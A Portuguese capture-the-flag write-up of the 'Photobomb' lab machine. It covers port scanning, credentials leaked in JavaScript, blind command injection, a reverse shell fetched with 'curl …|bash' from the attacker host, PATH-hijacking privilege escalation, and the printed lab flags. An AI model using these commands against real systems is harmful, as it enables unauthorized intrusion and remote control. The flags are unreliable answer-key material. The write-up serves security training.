Photobomb

#easy #eWPT #OSCP

Máquina Linux fácil projetada para explorar um Blind Command Injection e por fim escalar privilégios através de um Path Hijacking.

Portscan

Comecei executando um ping no endereço IP do alvo para determinar o sistema operacional em uso. O valor TTL mais próximo de 64 indica que há grandes chances do alvo estar executando um sistema operacional Linux.

attacker> ping -c 1 10.10.11.182
PING 10.10.11.182 (10.10.11.182) 56(84) bytes of data.
64 bytes from 10.10.11.182: icmp_seq=1 ttl=63 time=324 ms

--- 10.10.11.182 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 323.754/323.754/323.754/0.000 ms

Em seguida, executei um escaneamento de porta no alvo para identificar quaisquer portas abertas que pudessem ser usadas para novos ataques. Usei a ferramenta rustscan para verificar todas as portas (1-65535) no alvo. A varredura revelou a porta 80 HTTP aberta rodando um nginx 1.18.0 em um Linux Ubuntu além da porta 22 rodando um OpenSSH 8.2p1.

attacker> rustscan -a 10.10.11.182 -r 1-65535 --ulimit 5000 -- -sCV -n -Pn -oX nmap.xml
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6+RJ9JSdH4fFJPibAIpAZXAl7vCJA+98jmlaLCsANWQXth3UsQ+TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow+OUdXlmoxw+n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t+kpLAcsES6+yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60=
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
|   256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A varredura também retornou um nome de domínio que adicionei ao meu arquivo /etc/hosts.

attacker> grep 'photobomb.htb' /etc/hosts
10.10.11.182    photobomb.htb

HTTP (80) Enumeration

Em seguida, passei a enumerar o serviço HTTP usando a ferramenta whatweb para coletar informações sobre o software e a versão do servidor web.

attacker> whatweb -v http://photobomb.htb | tee whatweb.txt
WhatWeb report for http://photobomb.htb
Status    : 200 OK
Title     : Photobomb
IP        : 10.10.11.182
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0], Script, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Mon, 05 Dec 2022 22:14:23 GMT
        Content-Type: text/html;charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        X-Xss-Protection: 1; mode=block
        X-Content-Type-Options: nosniff
        X-Frame-Options: SAMEORIGIN
        Content-Encoding: gzip

Navegando na porta 80, temos o website de uma gráfica.

A página tem um link (click here) redirecionando para a rota /printer que possui um painel de autenticação.

Fazendo um spidering nesta aplicação usando a ferramenta gospider, identificamos uma credencial exposta no arquivo photobomb.js.

attacker> gospider -s http://photobomb.htb
[url] - [code-200] - http://photobomb.htb
[javascript] - http://photobomb.htb/photobomb.js
[linkfinder] - [from: http://photobomb.htb/photobomb.js] - http://pH0t0:b0Mb!@photobomb.htb/printer

Indo ao arquivo, vemos uma função JavaScript que possui um hiperlink expondo de fato uma credencial.

Com isso, nota-se a importância de visualizar o código fonte de um site e analisar códigos JavaScript. Os desenvolvedores web às vezes cometem erros e deixam falhas de configuração ou credenciais dentro do código fonte visível de uma página web.

Agora vamos tentar fazer o login com esse nome de usuário pH0t0 e senha b0Mb!. Usando essa credencial ganhamos acesso a rota /printer.

Nessa rota, temos uma página com diversas imagens, bem como a capacidade de especificar suas dimensões e fazer o download delas.

Command Injection

Portanto, ao clicar em download, interceptei a requisição usando o Burp Suite para visualizar o que está sendo enviado para o servidor.

Após alguns testes, percebo que o parâmetro filetype é vulnerável a Blind Command Injection. Como prova de conceito (PoC), enviei um ping para minha máquina atacante e aguardei a resposta do ping com a ferramenta tcpdump.

Ao enviar a requisição maliciosa com o Burp Suite, recebemos um ping do alvo, ou seja, de fato o parâmetro filetype é vulnerável a injeção de comando, e temos comunicação direta com o alvo.

attacker> tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
17:53:37.730711 IP photobomb.htb > 10.10.14.123: ICMP echo request, id 3, seq 1, length 64
17:53:37.730795 IP 10.10.14.123 > photobomb.htb: ICMP echo reply, id 3, seq 1, length 64
^C
2 packets captured
2 packets received by filter
0 packets dropped by kernel

Gaining Access

A mesma dinâmica funciona usando cURL em vez de ping. Portanto, podemos tirar proveito disso para obter uma reverse shell.

Para fazer isso, estarei compartilhando com um servidor HTTP do python um arquivo index.html malicioso, contendo um script bash para enviar uma shell para um netcat que estará em escuta na minha máquina atacante.

attacker> cat index.html
#!/bin/bash
bash -i >& /dev/tcp// 0>&1

attacker> python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

A ideia é que ao fazer o alvo enviar um cURL para este arquivo index.html e interpretá-lo com | bash, o alvo executará o comando que colocamos no index.html, e consequentemente enviará uma reverse shell para nosso netcat.

curl http://10.10.14.123/|bash

Assim, ganhamos acesso ao alvo como usuário wizard.

attacker> nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.123] from (UNKNOWN) [10.10.11.182] 59862
bash: cannot set terminal process group (702): Inappropriate ioctl for device
bash: no job control in this shell

wizard@photobomb:~/photobomb$ hostname -I; day=$USER; echo $day
hostname -I; day=$USER; echo $day
10.10.11.182 dead:beef::250:56ff:feb9:24a2
wizard

TTY Treatment

Para estabilizar meu console após obter acesso, usei o comando "script /dev/null -c bash" que inicia uma nova sessão do bash e envia toda a saída para /dev/null. Em seguida, coloquei o processo em segundo plano com Ctrl+Z e executei "stty raw -echo" e "fg" para colocar o processo de volta em primeiro plano.

wizard@photobomb:~/photobomb$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
wizard@photobomb:~/photobomb$ ^Z
zsh: suspended  nc -nlvp 443

attacker> stty raw -echo; fg
[1]  + continued  nc -nlvp 443
                              reset xterm

Em seguida, verifiquei e consertei o tamanho do terminal com "stty size", e também defini minhas variáveis de ambiente $TERM e $SHELL como xterm e bash respectivamente. Essas etapas me ajudaram a melhorar a legibilidade e a usabilidade da interface de linha de comando enquanto trabalhava no alvo.

attacker> stty size
52 128

wizard@photobomb:~/photobomb$ stty rows 52 columns 128
wizard@photobomb:~/photobomb$ export SHELL=bash TERM=xterm

Navegando ao diretório /home do usuário wizard podemos encontrar a flag user.txt.

wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
affce247c90da3c7593abebe0c9c6e08

Com essa flag, concluímos o primeiro objetivo do CTF e podemos passar para a próxima etapa de escalar privilégios para obter acesso a flag root.txt.

Privilege Escalation

Utilizando o comando sudo -l, foi possível verificar quais comandos o usuário atual tinha permissão de executar como root. O comando revelou que o usuário tinha permissão para executar o script /opt/cleanup.sh definindo a variável de ambiente $PATH e sem a necessidade de inserir senha.

wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

Listando este script, vemos que ele pertence ao usuário root.

wizard@photobomb:~$ ls -la /opt/cleanup.sh
-r-xr-xr-x 1 root root 340 Sep 15 12:11 /opt/cleanup.sh

Abrindo o script podemos vemos que o binário find está sendo definido sem rota absoluta, portanto, podemos aplicar um Path Hijacking.

Obs: Não só o find mas no script também temos a presença do caractere "[" na condição if, e "[" no Linux é reconhecido como um binário, portanto, o abuso de path hijacking curiosamente também poderia ser feito com "[".

Com isto, no diretório /tmp podemos criar um arquivo chamado find contendo o comando bash.

wizard@photobomb:/tmp$ echo '/bin/bash' > find
wizard@photobomb:/tmp$ chmod +x find
wizard@photobomb:/tmp$ export PATH=/tmp:$PATH
wizard@photobomb:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Agora, ao executarmos o script /opt/cleanup.sh como sudo definindo a variável de ambiente $PATH (SETENV) como sendo /tmp, ao ser executado, o script interpretá-ra que o find que ele deve usar é o que criamos no diretório /tmp, e assim, ganharemos uma shell como root.

wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# whoami
root

Então basta ler a flag root.txt no diretório /root para concluir o objetivo do CTF.

root@photobomb:/home/wizard/photobomb# cat /root/root.txt
8b096e9b696629d58d8ea5173764a194